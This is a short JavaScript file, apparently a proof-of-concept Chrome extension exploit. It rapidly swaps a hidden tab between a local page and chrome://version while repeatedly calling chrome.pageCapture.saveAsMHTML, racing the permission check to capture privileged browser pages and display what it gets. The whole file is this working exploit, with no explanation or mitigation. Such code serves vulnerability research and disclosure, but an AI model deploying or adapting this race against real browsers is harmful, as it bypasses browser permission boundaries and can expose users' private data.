function sleep(ms) {
  return new Promise((resolve,reject) => {
    setTimeout(()=>resolve(), ms);
  });
}

async function run() {
  let create_result = await chrome.tabs.create({url:'empty.html',active:false});
  let child_id = create_result.id;

  async function flipper() {
    while (1) {
      await chrome.tabs.update(child_id, {url:'empty.html'});
      await sleep(10);
      await chrome.tabs.update(child_id, {url:'chrome://version'});
      await sleep(10);
    }
  }
  flipper();

  async function dumper() {
    let longest_dump = '';
    while (1) {
      try {
        let mhtml = await chrome.pageCapture.saveAsMHTML({tabId: child_id});
        let mhtml_text = await mhtml.text();
        let mhtml_lines = mhtml_text.split('\n');
        if (!mhtml_lines[1].endsWith('/empty.html') && mhtml_lines[2].trim() != 'Subject:') {
          console.log(mhtml_text);
          if (mhtml_text.length > longest_dump.length) {
            longest_dump = mhtml_text;
            document.body.innerText = longest_dump;
          }
        }
      } catch (err) {
        if (err.message != "Don't have permissions required to capture this page.")
          console.log(err);
      }
      await sleep(12);
    }
  }
  dumper();
}
run();